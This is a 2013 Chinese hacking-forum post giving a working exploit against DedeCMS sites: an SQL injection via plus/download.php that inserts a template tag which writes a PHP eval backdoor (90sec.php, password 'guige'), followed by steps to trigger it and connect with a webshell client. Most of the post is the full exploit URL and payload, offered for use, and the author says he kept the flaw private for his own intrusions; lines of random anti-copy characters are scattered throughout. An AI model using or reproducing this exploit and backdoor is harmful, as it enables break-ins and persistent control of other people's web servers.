本帖最后由 土豆 于 2013-6-10 14:41 编辑
b# n- E+ j9 c8 N k
1 [$ m; y+ l3 Y, R- I+ Q) T+ H
/ U8 ~! r/ c- T# }) F" v作者:鬼哥+ ~. n0 W+ P: D, d' }
( \! i6 t2 A1 [- b看贴不回,没JJ
! l( ~" t4 R: r2 R# G8 E8 @6 D9 J% q7 z, S. K5 Z
漏洞大家都知道是哪个。" h2 v, h& M& ^1 M2 \% k g9 O( ~$ `" L
8 x0 f+ u! p8 `. t其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。
1 B. ?) b% t r* T
" u2 o( p8 }. \: v P& l) y Q但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。 g' e. |+ F! i3 J4 g, v
4 q* I7 y6 R, z' ?, w2 q' N
刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?& \" `, z! i2 M" ?% q6 R" s
# v2 _+ K# w1 |, b5 v8 ?
getshell 很容易 。 既然刚发出来的是 sql方法getshell 我也看到几个人发了sql增加表mytag的内容。
; t- T) i; h8 e3 q7 D
. x/ A$ ^; X% z" U' k& g% O+ O但是测试了下。。失败; x- f7 Y! ]% U: V! D1 L, Q
# m# H- {0 i- ?9 I9 a7 z& G4 k2 p原因: 用的语句是update 很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴 错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。: h/ H. ?+ z* M; o' M# e$ Z
! L, \9 S: E [; f
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`. t# K# v4 H7 s, m: ^
% g9 @8 k5 s7 ]" j. g; s. o! i
EXP:
5 R8 ?+ F1 z/ e/ B! o% e6 |$ d$ b* S' o
http://www.xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
* j ^3 L! u5 Y7 ~, B% [! c
' V& f9 A8 ~9 D0 @5 e6 U, X' _4 [9 }; v3 L/ G
成功增加。+ Q' e% g/ {$ a7 |
9 y+ ^7 S. F6 {+ d: V访问http://www.xxx.com/plus/mytag_js.php?aid=9013$ D* _( c0 N& M
生成一句话木马.! ^+ _2 ^' j! U# c
菜刀连接 http://www.xxx.com/plus/90sec.php 密码 guige5 i7 R( E( K) j, M8 O" @6 y
% G$ K$ K. \+ T) b; B# V* u- o, P
测试OK。
$ I; N) T& _& U, y; s' P/ s
: \( H4 Q* x' g4 H- X
. [$ H$ d2 q/ `/ d% f/ r" }( y' y |
发表于 2013-6-10 16:49:18
收藏
支持
反对